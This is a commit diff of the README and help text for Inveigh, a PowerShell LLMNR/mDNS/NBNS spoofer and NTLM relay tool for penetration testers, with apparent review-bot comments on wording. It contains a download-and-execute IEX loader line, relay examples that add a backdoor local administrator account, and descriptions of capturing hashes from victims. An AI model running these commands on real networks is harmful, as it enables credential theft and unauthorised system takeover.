author    Kevin Robertson <robertsonk@gmail.com>  2017-04-02 22:09:01 -0400
committer Kevin Robertson <robertsonk@gmail.com>  2017-04-02 22:09:01 -0400
commit    0069276d8874ced0cfc3b72d54ce0c49b4de72c6 (patch)
tree      74ac73ad8217bc23dada19e15c248190ff01e43b
parent    5e0baa7b5fdd109d8c959205b3abc8dbbc5bdddb (diff)
download  Inveigh-0069276d8874ced0cfc3b72d54ce0c49b4de72c6.tar.gz
          Inveigh-0069276d8874ced0cfc3b72d54ce0c49b4de72c6.zip
mDNS spoofer, log control, bug fixes
Added mDNS spoofer. Simplified some HTTP listener code. Added LogOutput and ConsoleQueueLimit parameters to control in-memory log entry storage. Fixed some bugs.
-rw-r--r--  README.md                   203
-rw-r--r--  Scripts/Inveigh-Relay.ps1  1030
-rw-r--r--  Scripts/Inveigh.ps1        1524
3 files changed, 1882 insertions, 875 deletions
diff --git a/README.md b/README.md
index 86f5c40..f6e7492 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,9 @@
-# Inveigh
-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool designed to assist penetration testers that find themselves limited to a Windows system.
+# **Inveigh**
+
+Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
+
+## Wiki
+* https://github.com/Kevin-Robertson/Inveigh/wiki
## Included In
* PowerShell Empire - https://github.com/PowerShellEmpire/Empire
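Review bot: the new title `# **Inveigh**` wraps the heading text in bold markers, which is redundant (an H1 already renders bold) and shows up literally in renderers that do not nest inline emphasis inside headings; the previous `# Inveigh` is enough. The restyled description also reads better as "penetration testers/red teamers who find themselves limited to a Windows system".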
@@ -10,194 +14,23 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
* pupy - https://github.com/n1nj4sec/pupy
## Special Thanks
-* Anyone that posted .NET packet sniffing examples.
-* Responder - https://github.com/SpiderLabs/Responder
+* Anyone that posted .NET packet sniffing examples
+* Responder - https://github.com/lgandx/Responder
* Impacket - https://github.com/CoreSecurity/impacket
-## Import
-* To import with Import-Module:
- Import-Module ./Inveigh.psd1
-
-* To import using the dot source method:
- . ./Inveigh.ps1
- . ./Inveigh-Relay.ps1
-
-* To load into memory using Invoke-Expression:
- IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")
- IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1")
-
-## System Requirements
-* Tested minimums are PowerShell 2.0 and .NET 3.5
-
-## Functions
-* Invoke-Inveigh
-* Invoke-InveighRelay
-* Clear-Inveigh
-* Get-Inveigh
-* Stop-Inveigh
-* Watch-Inveigh
-
-### Invoke-Inveigh
-* The main Inveigh LLMNR/NBNS spoofer function.
-
-##### Features:
-* IPv4 LLMNR/NBNS spoofer with granular control
-* NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/SMB
-* Basic auth cleartext credential capture over HTTP/HTTPS
-* WPAD server capable of hosting a basic or custom wpad.dat file
-* HTTP/HTTPS server capable of hosting limited content
-* Granular control of console and file output
-* Run time control
-
-##### Notes:
-* LLMNR/NBNS spoofing is performed by packet sniffing and responding through raw sockets.
-* SMB challenge/response captures are performed by sniffing over the host system's SMB service.
-* The local LLMNR/NBNS services do not need to be disabled on the host system.
-* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
-* Ensure that any needed LMMNR, NBNS, SMB, HTTP, HTTPS ports are open within any local firewall on the host system.
-* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns.
-
-##### Examples:
-* To execute with default settings:
- Invoke-Inveigh
-
-* To load and execute with one line:
- Import-Module ./Inveigh.ps1;Invoke-Inveigh
-
-* To execute with ConsoleOutput, FileOutput, and the NBNS spoofer enabled.
- Invoke-Inveigh -ConsoleOutput Y -FileOutput Y -NBNS Y
-
-##### Screenshot:
-![inveigh](https://cloud.githubusercontent.com/assets/5897462/18420523/924f9c7a-7842-11e6-984e-153058b28016.png)
-
-##### Parameters:
-* __ElevatedPrivilege__ - Default = Auto: (Auto,Y,N) Set the privilege mode. Auto will determine if Inveigh is running with elevated privilege. If so, options that require elevated privilege can be used.
-* __IP__ - Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set.
-* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.
-* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. Listed hostnames will override the whitelist created through SpooferLearning.
-* __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
-* __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.
-* __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
-* __SpooferLearning__ - Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the hostname to a spoofing blacklist. The valid system must respond to the protocol type that matches the protocol of the original request in order to be blacklisted.
-* __SpooferLearningDelay__ - (Interger) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning.
-* __SpooferLearningInterval__ - Default = 30 Minutes: (Interger) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a hostname that has already been checked if SpooferLearning is enabled.
-* __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
-* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer.
-* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet.
-* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer.
-* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet.
-* __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
-* __NBNSBruteForce__ - Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer.
-* __NBNSBruteForceHost__ - Default = WPAD: Hostname for NBNS brute force spoofer.
-* __NBNSBruteForcePause__ Default = Disabled: (Integer) Time in seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received.
-* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
-* __HTTPIP__ - Default = Any: IP address for the HTTP listener.
-* __HTTPPort__ - Default = 80: TCP port for the HTTP listener.
-* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
-* __HTTPSPort__ - Default = 443: TCP port for the HTTPS listener.
-* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
-* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
-* __HTTPContentType__ - Default = text/html: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse.
-* __HTTPDir__ - Full directory path to enable hosting of basic content through the HTTP/HTTPS listener.
-* __HTTPDefaultFile__ - Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests.
-* __HTTPDefaultEXE__ - EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests.
-* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary.
-* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
-* __HTTPSPort__ - Default = 443: TCP port for the HTTPS listener.
-* __HTTPSCertIssuer__ - Default = Inveigh: The issuer field for the cert that will be installed for HTTPS.
-* __HTTPSCertSubject__ - Default = localhost: The subject field for the cert that will be installed for HTTPS.
-* __HTTPSForceCertDelete__ - Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject.
-* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
-* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
-* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
-* __WPADDirectFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse.
-* __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy.
-* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary.
-* __Proxy__ - Default = Disabled: (Y/N) Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures.
-* __ProxyAuth__ - Default = NTLM: (Basic,NTLM,NTLMNoESS) Proxy server authentication type.
-* __ProxyIP__ - Default = Any: IP address for the proxy listener.
-* __ProxyPort__ - Default = 8492: TCP port for the proxy listener.
-* __ProxyIgnore__ - Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening.
-* __SMB__ - Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host.
-* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
-* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-* __ConsoleOutput__ - Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
-* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions.
-* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled.
-* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output.
-* __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled.
-* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
-* __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled.
-* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled.
-* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
-* __StartupChecks__ - Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
-* __RunCount__ - Default = Unlimited: (Integer) Number of NTLMv1/NTLMv2 captures to perform before auto-exiting.
-* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes.
-* __Inspect__ - (Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic.
-* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
-
-### Invoke-InveighRelay
-* The NTLMv2 HTTP/HTTPS to SMB relay command execution function. This function can be used with or without Invoke-Inveigh.
-
-##### Features:
-* HTTP/HTTPS to SMB NTLMv2 relay with granular control
-* NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
-* Granular control of console and file output
+At its core, Inveigh is a .NET packet sniffer that listens and responds to LLMNR/mDNS/NBNS requests while also capturing incoming NTLMv1/NTLMv2 authentication attempts over the Windows SMB service. The primary advantage of this packet sniffing method on Windows is that port conflicts with default running services are avoided. Inveigh’s HTTP/HTTPS/Proxy based features are not provided through the packet sniffer, they are provided through TCP listeners. Inveigh relies on creating multiple runspaces to load the sniffer, listeners, and control functions within a single shell and PowerShell process.
-##### Examples:
-* To execute with basic options:
- Invoke-Inveigh -HTTP N
- Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add"
-
-* To execute with and only perform SMB relay with the 'Administrator' account:
- Invoke-InveighUnprivileged -HTTP N
- Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add" -SMBRelayUsernames Administrator
+##### Inveigh running with elevated privilege
+![Inveigh](https://github.com/Kevin-Robertson/Inveigh/wiki/images/Inveigh.PNG)
-##### Screenshot:
-![inveigh-relay](https://cloud.githubusercontent.com/assets/5897462/18420526/9991a758-7842-11e6-90b2-9d519ff03c28.png)
+Since the .NET packet sniffer requires elevated privilege, Inveigh also contains UDP listener based LLMNR/mDNS/NBNS functions. These listeners can provide the ability to perform spoofing with only unprivileged access. Port conflicts can still be an issue with any running Windows listeners bound to 0.0.0.0. This generally impacts LLMNR. On a system with the Windows LLMNR service running, Inveigh’s unprivileged LLMNR spoofer will not be able to start. Inveigh can generally perform unprivileged NBNS spoofing on systems with the NBNS service already running since it’s often not bound to 0.0.0.0. Most of Inveigh’s other features, with the primary exceptions of the packet sniffer’s SMB capture and HTTPS (due to certificate install privilege requirements), do not require elevated privilege. Note that an enabled local firewall blocking all relevant ports, and without a listed service with open firewall access suitable for migration, can still prevent Inveigh from working with just unprivileged access since privileged access will likely be needed to modify the firewall settings.
-##### Parameters:
-* __Command__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
-* __Target__ - IP address of system to target for SMB relay.
-* __Service__ - Default = 20 Character Random: Name of the service to create and delete on the target.
-* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
-* __HTTPIP__ - Default = Any: IP address for the HTTP/HTTPS listener.
-* __HTTPPort__ - Default = 80: TCP port for the HTTP listener.
-* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
-* __HTTPSCertIssuer__ - Default = Inveigh: The issuer field for the cert that will be installed for HTTPS.
-* __HTTPSCertSubject__ - Default = localhost: The subject field for the cert that will be installed for HTTPS.
-* __HTTPSForceCertDelete__ - Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject.
-* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target.
-* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
-* __Proxy__ - Default = Disabled: (Y/N) Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures.
-* __ProxyIP__ - Default = Any: IP address for the proxy listener.
-* __ProxyPort__ - Default = 8492: TCP port for the proxy listener.
-* __ProxyIgnore__ - Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening.
-* __Usernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.
-* __RelayAutoDisable__ - Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target.
-* __RelayAutoExit__ - Default = Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error.
-* __ConsoleOutput__ - Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
-* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions.
-* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled.
-* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output.
-* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
-* __OutputStreamOnly__ - Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled.
-* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled.
-* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
-* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes.
-* __SMB1__ - (Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target.
-* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
+By default, Inveigh will attempt to detect the privilege level and load the corresponding functions.
-##### Notes:
-* Ensure that any needed HTTP, HTTPS ports are open within any local firewall on the host system.
-* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns.
+##### Inveigh running without elevated privilege
+![Unprivileged](https://github.com/Kevin-Robertson/Inveigh/wiki/images/Unpriv.PNG)
-### Support Functions
-* __Clear-Inveigh__ - Clear Inveigh data from memory
-* __Get-Inveigh__ - Get Inveigh data from memory - Parameters: Console, ClearText, CleartextUnique, Learning, Log, NTLMv1, NTLMv1Unique, NTLMv1Usernames, NTLMv2, NTLMv2Unique, NTLMv2Usernames, POSTRequest, POSTRequestUnique
-* __Stop-Inveigh__ - Stop all running Inveigh functions
-* __Watch-Inveigh__ - Enable real time console output
+Inveigh provides NTLMv1/NTLMv2 HTTP/HTTPS/Proxy to SMB1/SMB2 relay through the Inveigh-Relay module. This module does not require elevated privilege, again with the exception of HTTPS, on the Inveigh host. However, since the module currently only has a PSExec type command execution attack, the relayed challenge/response will need to be from an account that has remote command execution privilege on the target. The Inveigh host itself can be targeted for relay if the goal is local privilege escalation.
-##### Screenshot:
-![inveigh-support](https://cloud.githubusercontent.com/assets/5897462/18420531/b1858e2e-7842-11e6-9f03-0e86ee704211.png)
+##### Inveigh and Inveigh-Relay running together to execute an Empire 2.0 launcher
+![Relay](https://github.com/Kevin-Robertson/Inveigh/wiki/images/Relay.PNG) \ No newline at end of file
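Review bot: this hunk drops the Import, System Requirements (PowerShell 2.0 / .NET 3.5 minimums) and Support Functions sections without a replacement, so the README no longer tells a reader how to load the module, which PowerShell/.NET versions are supported, or that Clear-Inveigh, Get-Inveigh, Stop-Inveigh and Watch-Inveigh exist; a one-line pointer saying these now live on the wiki, or a short Import section kept in place, would close the gap. The removed Notes also carried two operational caveats worth keeping in the new overview: logins are processed by the host's own SMB service, so the assessed domain's account lockout policy applies, and the HTTPS option installs a certificate that must be removed by hand if the function does not exit gracefully. Two smaller points: `Inveigh’s HTTP/HTTPS/Proxy based features are not provided through the packet sniffer, they are provided through TCP listeners.` is a comma splice (a semicolon or `but` fixes it), and the rewritten file ends without a trailing newline.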
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index 983ac0c..6c71c9f 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -14,14 +14,35 @@ Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB1/SMB2 relay with psexe
NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
Granular control of console and file output
+.PARAMETER Challenge
+Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
+challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be
+pulled from the SMB relay target.
+
.PARAMETER Command
Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
-.PARAMETER Target
-IP address of system to target for SMB relay.
+.PARAMETER ConsoleOutput
+Default = Disabled: (Low/Medium/Y/N) Enable/Disable real time console output. If using this option through a shell, test to
+ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
-.PARAMETER Service
-Default = 20 Character Random: Name of the service to create and delete on the target.
+.PARAMETER ConsoleQueueLimit
+Default = Unlimited: Maximum number of queued up console log entries when not using the real time console.
+
+.PARAMETER ConsoleStatus
+(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
+displaying full capture lists when running through a shell that does not have access to the support functions.
+
+.PARAMETER ConsoleUnique
+Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time console output is enabled.
+
+.PARAMETER FileOutput
+Default = Disabled: (Y/N) Enable/Disable real time file output.
+
+.PARAMETER FileOutputDirectory
+Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be
+enabled.
.PARAMETER HTTP
Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
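Review bot: the ConsoleQueueLimit entry says `Default = Unlimited`, but the param block later in this patch initialises it as `[Int]$ConsoleQueueLimit = "-1"`, so the help should state that -1 means no limit and what happens once the limit is reached (oldest entries discarded, or new ones dropped); without that, someone bounding memory on a long run cannot tell which entries survive. Also `queued up console log entries` reads better as `queued console log entries`, and FileOutputDirectory is documented here while the removed README text and the param block below refer to `OutputDir`; confirm the parameter was actually renamed so the help and the code agree.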
@@ -34,8 +55,8 @@ Default = 80: TCP port for the HTTP listener.
.PARAMETER HTTPS
Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
-the local store and attached to port 443. If the script does not exit gracefully, manually remove the certificate.
-This feature requires local administrator access.
+the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires
+local administrator access.
.PARAMETER HTTPSPort
Default = 443: TCP port for the HTTPS listener.
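Review bot: dropping `attached to port 443` is correct now that HTTPSPort is configurable, but the remaining instruction `manually remove the certificate` is less complete than the README text removed in this same patch, which named the store location (`Local Computer\Personal`) and the `netsh http delete sslcert` binding removal; the help should say that both the certificate and the SSL binding on the configured HTTPSPort need cleanup, otherwise an aborted run leaves a stale listener binding and an untrusted certificate on the host.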
@@ -49,17 +70,16 @@ Default = localhost: The subject field for the cert that will be installed for H
.PARAMETER HTTPSForceCertDelete
Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject.
-.PARAMETER Challenge
-Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
-challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be
-pulled from the SMB relay target.
+.PARAMETER LogOutput
+Default = Enabled: (Y/N) Enable/Disable storing log messages in memory.
.PARAMETER MachineAccounts
Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-.PARAMETER WPADAuth
-Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
-Anonymous can prevent browser login prompts.
+.PARAMETER OutputStreamOnly
+Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if
+running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the
+various yellow warning messages if enabled.
.PARAMETER ProxyRelay
Default = Disabled: (Y/N): Enable/Disable relaying proxy authentication.
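Review bot: the new LogOutput description (`Enable/Disable storing log messages in memory`) should say how it interacts with the other logging controls: whether ConsoleQueueLimit still applies when LogOutput is N, and that the in-memory log read back by the support functions (the removed README listed Get-Inveigh with a Log parameter) will be empty when it is disabled. Stating that FileOutput is unaffected would also help operators who disable in-memory storage to keep the process footprint small but still want an on-disk record.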
@@ -78,10 +98,6 @@ cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox
-SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by
closing and reopening.
-.PARAMETER Usernames
-Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
-domain\username format.
-
.PARAMETER RelayAutoDisable
Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on
target.
@@ -89,36 +105,15 @@ target.
.PARAMETER RelayAutoExit
Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error.
-.PARAMETER ConsoleOutput
-Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to
-ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
-
-.PARAMETER ConsoleStatus
-(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
-displaying full capture lists when running through a shell that does not have access to the support functions.
-
-.PARAMETER ConsoleUnique
-Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
-and username combinations when real time console output is enabled.
-
-.PARAMETER FileOutput
-Default = Disabled: (Y/N) Enable/Disable real time file output.
-
-.PARAMETER StatusOutput
-Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
-
-.PARAMETER OutputStreamOnly
-Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if
-running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the
-various yellow warning messages if enabled.
-
-.PARAMETER OutputDir
-Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be
-enabled.
-
.PARAMETER RunTime
(Integer) Run time duration in minutes.
+.PARAMETER Service
+Default = 20 Character Random: Name of the service to create and delete on the target.
+
+.PARAMETER ShowHelp
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+
.PARAMETER SMB1
(Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the
target.
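Review bot: `automaticaly` in the RelayAutoExit entry, and in the RelayAutoDisable entry just above it, should be `automatically`; since this patch already reorders the surrounding help text, fix it here.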
@@ -126,14 +121,30 @@ target.
.PARAMETER StartupChecks
Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
-.PARAMETER ShowHelp
-Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+.PARAMETER StatusOutput
+Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
+
+.PARAMETER Target
+IP address of system to target for SMB relay.
.PARAMETER Tool
-Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's
+Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's
PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
0 = None, 1 = Metasploit/Meterpreter, 2 = Empire
+.PARAMETER Usernames
+Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
+domain\username format.
+
+.PARAMETER WPADAuth
+Default = NTLM: (Anonymous/NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts.
+
+.PARAMETER WPADAuthIgnore
+Default = Disabled: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login
+popups for authenticated wpad.dat requests such as Firefox.
+
.EXAMPLE
Invoke-Inveigh -HTTP N
Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Spring2017 /add && net localgroup administrators Inveigh /add"
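Review bot: the WPADAuthIgnore description ends `...browsers like Firefox that display login popups for authenticated wpad.dat requests such as Firefox.`, naming Firefox twice; drop the trailing `such as Firefox`. It would also help to state how this list differs from ProxyIgnore (which withholds the proxy wpad.dat from matching user agents) versus WPADAuthIgnore (which serves the file but skips NTLM authentication for them), since both filter on user agent and a reader will otherwise wonder why there are two lists. `Default = Disabled` for a list parameter is also slightly off; `Default = None` matches how Usernames is described.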
@@ -146,39 +157,42 @@ https://github.com/Kevin-Robertson/Inveigh
[CmdletBinding()]
param
(
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N",
